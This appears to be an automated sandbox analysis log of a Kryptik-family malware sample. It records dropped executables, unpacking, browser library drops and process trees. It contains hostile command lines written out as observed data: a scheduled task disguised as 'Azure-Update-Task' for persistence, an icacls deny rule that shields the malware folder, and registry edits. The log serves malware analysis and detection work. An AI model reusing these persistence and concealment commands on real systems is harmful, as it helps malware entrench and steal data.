Source: build2.exe, 00000013.00000003.1990340440.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1974606223.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1910519067.0000000003A0A000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1911033473.0000000001598000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1889539625.0000000003A24000.00000004.00000800.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1889705680.0000000003A07000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

ReversingLabs: Detection: 39%

Source: 1601.exe	String found in binary or memory: set-addPolicy
Source: 1601.exe	String found in binary or memory: id-cmc-addExtensions
Source: 1601.exe	String found in binary or memory: set-addPolicy
Source: 1601.exe	String found in binary or memory: id-cmc-addExtensions
Source: 1601.exe	String found in binary or memory: set-addPolicy
Source: 1601.exe	String found in binary or memory: id-cmc-addExtensions

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fcbhtea C:\Users\user\AppData\Roaming\fcbhtea
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe C:\Users\user\AppData\Local\Temp\1601.exe
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe C:\Users\user\AppData\Local\Temp\1601.exe
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: unknown	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe --Task
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe "C:\Users\user\AppData\Local\Temp\1601.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe "C:\Users\user\AppData\Local\Temp\1601.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe --Task
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe"
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\455F.exe C:\Users\user\AppData\Local\Temp\455F.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4DCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe"
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3968 -s 11016
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C2.bat" "	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe C:\Users\user\AppData\Local\Temp\1601.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\455F.exe C:\Users\user\AppData\Local\Temp\455F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4DCC.bat" "	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe C:\Users\user\AppData\Local\Temp\1601.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\Temp\1601.exe "C:\Users\user\AppData\Local\Temp\1601.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Process created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe"
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Process created: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 1601.exe, 1601.exe, 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: build2.exe, 00000013.00000002.2301766220.000000006CE2D000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: C:\hejuyabiyuda\lunofin.pdb source: build2.exe, 00000012.00000002.1802688961.0000000000412000.00000002.00000001.01000000.00000009.sdmp, build2.exe, 00000012.00000000.1799933563.0000000000412000.00000002.00000001.01000000.00000009.sdmp, build2.exe, 00000013.00000000.1800991482.0000000000412000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb@ source: build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: a+C:\hejuyabiyuda\lunofin.pdb source: build2.exe, 00000012.00000002.1802688961.0000000000412000.00000002.00000001.01000000.00000009.sdmp, build2.exe, 00000012.00000000.1799933563.0000000000412000.00000002.00000001.01000000.00000009.sdmp, build2.exe, 00000013.00000000.1800991482.0000000000412000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 00000019.00000002.1942406956.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, build3.exe, 00000019.00000000.1850735535.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, build3.exe, 0000001E.00000000.1941210012.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000021.00000002.2168461790.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, mstsca.exe, 00000021.00000000.1962875348.0000000000401000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 1601.exe, 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: build2.exe, 00000013.00000002.2301766220.000000006CE2D000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 00000019.00000002.1942406956.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, build3.exe, 00000019.00000000.1850735535.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, build3.exe, 0000001E.00000000.1941210012.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000021.00000002.2168461790.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, mstsca.exe, 00000021.00000000.1962875348.0000000000401000.00000020.00000001.01000000.0000000D.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Unpacked PE file: 0.2.SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\fcbhtea	Unpacked PE file: 4.2.fcbhtea.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Unpacked PE file: 9.2.1601.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Unpacked PE file: 16.2.1601.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 17.2.1601.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Unpacked PE file: 19.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 29.2.1601.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Unpacked PE file: 30.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 38.2.1601.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Unpacked PE file: 9.2.1601.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Unpacked PE file: 16.2.1601.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 17.2.1601.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Unpacked PE file: 19.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 29.2.1601.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Unpacked PE file: 30.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Unpacked PE file: 38.2.1601.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

9_2_00412220

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp{

Source: 455F.exe.2.dr	Static PE information: section name: .vmp
Source: 455F.exe.2.dr	Static PE information: section name: .vmp
Source: 455F.exe.2.dr	Static PE information: section name: .vmp{
Source: 455F.exe.2.dr	Static PE information: section name: .vmp{
Source: 455F.exe.2.dr	Static PE information: section name: .vmp{
Source: build3.exe.16.dr	Static PE information: section name: .kic
Source: build3[1].exe.16.dr	Static PE information: section name: .kic
Source: sqln[1].dll.19.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.19.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.19.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.19.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.19.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.19.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.19.dr	Static PE information: section name: .didat
Source: nss3.dll.19.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.19.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.19.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.19.dr	Static PE information: section name: .00cfg
Source: mstsca.exe.30.dr	Static PE information: section name: .kic

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004026D2 push ebx; ret	0_2_004026EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004026ED pushad ; ret	0_2_004026F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004026F7 push ebx; ret	0_2_00402714
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_00402745 push edi; ret	0_2_0040276D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_0040273B push edi; ret	0_2_00402742
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_00402595 push ss; ret	0_2_0040259C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004027BB push edi; ret	0_2_0040276D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF2822 push edi; ret	0_2_02CF27D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF25FC push ss; ret	0_2_02CF2603
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF27AC push edi; ret	0_2_02CF27D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF15A4 push AFD66869h; ret	0_2_02CF15A9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF27A2 push edi; ret	0_2_02CF27A9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF275E push ebx; ret	0_2_02CF277B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF2754 pushad ; ret	0_2_02CF275B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02CF2739 push ebx; ret	0_2_02CF2751
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F630D1 push ecx; retf	0_2_02F630D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F5D8BE pushad ; iretd	0_2_02F5D8BF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F62E61 push eax; iretd	0_2_02F62E62
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F63045 push ds; retf	0_2_02F63047
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F63049 push esi; iretd	0_2_02F6304B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F5C7B1 push AFD66869h; ret	0_2_02F5C7B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F5D980 push D23524A7h; retn 0006h	0_2_02F5D988
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_02F63107 push 4843A5D1h; retf	0_2_02F63113
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004026D2 push ebx; ret	4_2_004026EA
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004026ED pushad ; ret	4_2_004026F4
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004026F7 push ebx; ret	4_2_00402714
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_00402745 push edi; ret	4_2_0040276D
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_0040273B push edi; ret	4_2_00402742
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_00402595 push ss; ret	4_2_0040259C
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004027BB push edi; ret	4_2_0040276D
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_02CF2822 push edi; ret	4_2_02CF27D4

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\455F.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\build2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File created: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\msvcp140[1].dll	Jump to dropped file
